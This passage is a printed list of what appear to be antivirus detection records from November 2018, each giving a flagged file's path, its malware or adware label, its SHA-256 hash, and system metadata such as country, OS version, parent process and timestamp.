  Row(detection=Row(filename='cardrecovery.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\CardRecovery.exe", filesize=64000, name='BDS/Rogue.766012.#M1.#R1'), hash='d809a1cf78a0751b6980abcbb83f400d51e369658aefe4ec3acc97bf43fd79af', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Program Files (x86)\\360\\Cores\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:cUsVGYelgkW+dOtC.2', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T17:17:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0078983.exe', filepath='D:\\System Volume Information\\_restore{74287D37-4381-464D-8D02-0FE8636E81A2}\\RP327\\A0078983.exe', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='98ddf9522f992afb449837013a3c724c6f757d8447a756ee6debcd264a796b1a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:41:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hhn.exe', filepath='c:\\users\\X\\appdata\\roaming\\hhn.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T15:07:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asmakedisk.exe', filepath='\\\\?\\C:\\Users\\X\\Documents\\Marvell9128_V1001034_XpVistaWin7\\Marvell9128_V1001034_XpVistaWin7\\Driver\\AsMakeDisk.exe', filesize=1088000, name='W32/Neshta.A.#M1.#R1'), hash='ea91e176fa54dc01deb3694ea5351a038c6f87a15b61fe80cba7f3df95e312e1', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:17:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverreviver.exe', filepath='E:\\HBCD\\Programs\\DriverReviver.exe', filesize=64000, name='BDS/Rogue.766035.#M1.#R1'), hash='a4d3abd76129e10fefa2c2650cfd46e28530b443f76755f23d3f2e7b5c996f07', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='search provided by bing docif', filepath='C:\\Windows\\System32\\Tasks\\Search Provided by Bing docif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='f114c8e8be633ef687950961e4ca8b06cd88077eab28319fdb65d2330a9b5835', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:37:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='agendador-backup-2017_10_30_19_34_29.exe', filepath='C:\\Users\\X\\Desktop\\NextAgeERP\\Agendador-Backup-2017_10_30_19_34_29.exe', filesize=2240000, name='TR/Dropper.Gen.#M300.#R3643'), hash='fb9d480db0746b75b3c80d0c883c77963cdbce743c523f701a0b004ad7c18cad', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe38_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe38 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=272896, timestamp='2018-11-02T01:25:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsj4C4C.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:34:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asdlnaserverreal.exe', filepath='C:\\Program Files (x86)\\ASUS\\AI Suite II\\Remote GO!\\AsDLNAServerReal.exe', filesize=740000, name='W32/Sality.AT.#M1.#R1'), hash='9b0e8241995925093843498aa94953de110228fca66decb1a6de62ef7d462a4e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:59:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ebc9ee5453cd0ad0497310354aae89ced475f2bc', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\ebc9ee5453cd0ad0497310354aae89ced475f2bc', filesize=2944000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='e6a6aed8447438b8778fe053855d7eab75c3f9afa2cd1b8b2f3bde7d2a44236f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:49:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:01:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132549-94d66ca0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-132006-6D0AB6EB\\AVSCAN-20181102-132549-94D66CA0', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:23:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xcopy.exe', filepath='C:\\Windows\\System32\\xcopy.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c786b1c3006f9154eaf7cd6ca3c9321d66a92b3bb7df722c27e040ce08aeab69', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T05:04:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0010d047', filepath='C:\\ProgramData\\ESTsoft\\ALYac\\tmpArc\\tmp00000159\\tmp0010d047', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESTsoft\\ALYac\\AYRTSrv.aye', parentsize=624192, timestamp='2018-11-02T05:07:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='esplodew.exe', filepath='\\\\ts-xelcea\\share\\sts2008b\\cdswin\\esplodeW.exe', filesize=128000, name='W32/Stanit.#M1.#R1'), hash='c57cb68e67c5047cc23040c65b5601610ddf2166f43b1f9f900a3aabf59a5e3e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:32:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bmw taxi.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\BMW Taxi\\BMW Taxi.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='ee8c5d41dd28d2d5d3657d29cc611ae890e7e3c6697165cfce6bad98b9fcca08', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\xd330axi4bz\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541098846.5bdb4d5e52ec7', country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Free\\264368294.exe', parentsize=671232, timestamp='2018-11-02T00:43:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='da05d9c18a3cc81237be1db82b5ca7d5f73cbc535d7cae7d1e7f3b9f7b3a2576', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\DA05D9C18A3CC81237BE1DB82B5CA7D5F73CBC535D7CAE7D1E7F3B9F7B3A2576', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='da05d9c18a3cc81237be1db82b5ca7d5f73cbc535d7cae7d1e7f3b9f7b3a2576', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:07:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sbeagentupgrader.exe', filepath='C:\\ProgramData\\VIPRE Business Agent\\Downloads\\SBEAgentUpgrader.exe', filesize=480000, name='TR/Crypt.XPACK.Gen7.#M300.#R604486'), hash='9d474e14281cc8d51b8c02cf81a14415f94770561036fe42db4bf164613d9714', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\VIPRE Business Agent\\SBAMSvc.exe', parentsize=6787480, timestamp='2018-11-02T03:11:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\qffjtzsd2fb\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541047614.5bda853e876ec', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Backs\\701317936.exe', parentsize=671232, timestamp='2018-11-02T05:31:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\ANCIENPC\\C\\Program Files\\File Recovery\\undelete360\\unins000.exe', filesize=784000, name='W32/Sality.AT.#M1.#R1'), hash='d5ee8229a137c303b23ba143a490bb48d12f62f7f5b01c6ef269555c75f5e2c6', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:DOKd3VcrO0Sn1oz+.1', country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T07:48:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='voice.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\VOICE\\VOICE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='daae94b24cc0953acc0981f8c6ffb0e3b439c394f41f3a31e19f5cf11b05b7c2', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='raddfabf.tmp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\radDFABF.tmp.exe', filesize=192000, name='TR/Crypt.XPACK.cbfe7b.#M1.#R1'), hash='cbfe7b3aecfefb21ed525a4d4bb51de6a86b3466e2388fb487303bd908c9b7c7', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0010d45b', filepath='\\\\?\\C:\\ProgramData\\ESTsoft\\ALYac\\tmpArc\\tmp00000159\\tmp0010d45b', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:12:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fc0a873eb5e3fa7b34f3ca081a081042940a5986d40dc86d1ea58601b82bb46d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00296261', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296261', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:19:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='бланк письма 2014 пособие доп..exe', filepath='F:\\Проф\\Бланк письма 2014 пособие доп..exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='b1567728f7c9c301faf0e69894160bc87eea4da220c5850aa5f9d4863d75c3cf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Distrib\\Total Commander\\Totalcmd.exe', parentsize=826916, timestamp='2018-11-04T12:44:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023f476', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023f476', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:16:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_12c08020.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_12c08020.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='bfc42fbb92f0aadad7f76bdbee2a1605fb9ec584c65fdbecce239d5bac26b2a0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='C:\\Program Files\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='b05f7dfc5bbaf271f275eadc3290a47d0dae3335960c819f119bdc85ce1ca73f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:vu+xcyCxT0ePamJH.1', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-04T09:25:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297661', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297661', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:47:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-010837-4be8e746', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_abacec2e\\AVSCAN-20181105-010551-2D0A8DFE\\AVSCAN-20181105-010837-4BE8E746', filesize=24488000, name='TR/Taranis.1662.#M1.#R1'), hash='fa2bce126cfa481f81321cba3b51f8f5ae20aa8d848be627913248ba115324c5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:08:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='keygen.exe', filepath='\\\\?\\D:\\programs\\pro 5\\Keygen\\Keygen.exe', filesize=64000, name='TR/Agent.64000.65.#M1.#R1'), hash='f174ab207bf58acca7196b476fb0e2d85b087c5dd3d3b31015e4895128c23de1', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:51:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002935b3', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002935b3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:28:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e26dadab0222b19d7fda1be7a0f3401f7ca30cec62ae94127f99eb46b52aa5d4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\E26DADAB0222B19D7FDA1BE7A0F3401F7CA30CEC62AE94127F99EB46B52AA5D4', filesize=32000, name='TR/Crypt.XPACK.Gen7.#M300.#R601411'), hash='e26dadab0222b19d7fda1be7a0f3401f7ca30cec62ae94127f99eb46b52aa5d4', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T09:32:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291dfb', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291dfb', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:01:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lostfile_exe_19497824.exe', filepath='\\\\?\\C:\\Users\\X\\Dropbox\\Formateo de PC\\Escuelas\\Escuela Nueva TP\\Imagen bak up\\E\\Lost Files\\LostFile_EXE_19497824.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='e5bd9b27ff3b1dd431abfe50b563f408514f84143795039eee6254dd7ed2d810', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:49:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='enbhost.exe', filepath='I:\\E\\Program Files\\SK\\Skyrim\\enbhost.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='e65b5e69a08d8866bf7663f2498b8aa226a42a799f0a7119bfe6aa27c81d1b50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\软件\\fastcopy_ha\\FastCopy.exe', parentsize=412672, timestamp='2018-11-04T18:39:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-21-004829/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T01:18:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=6912000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e6d0644bfc0cc3f3082d01bd4c91a30dcafe971b182401da1064c7c91993b67f', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T16:11:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='slu5zrbvuf.exe', filepath='F:\\sLU5ZRBvUF.exe', filesize=5056000, name='HEUR/APC.#M1.#R1'), hash='fbcac9590f9e5f3e2a8e55a4ccdd9e318c39a1890b033e450ef311233924e63c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T18:36:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f1c411909506e9f587576ef73bbfc951809168580a4f9c27d062510aa7009c73', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\F1C411909506E9F587576EF73BBFC951809168580A4F9C27D062510AA7009C73', filesize=1920000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='f1c411909506e9f587576ef73bbfc951809168580a4f9c27d062510aa7009c73', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:50:55Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='audiodelaycomp.dll', filepath='C:\\Program Files\\FreeTime\\FormatFactory\\FFModules\\RMCodecs\\tools\\audiodelaycomp.dll', filesize=260000, name='W32/Ramnit.C.#M0.#R0'), hash='6c10823b97b4c62ac6c909040cf3f4310347ad3d1b4bf2aff592c29ce94bc573', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T10:25:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:18:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T22:30:15Z'), dt=datetime.date(2018, 11, 2)),
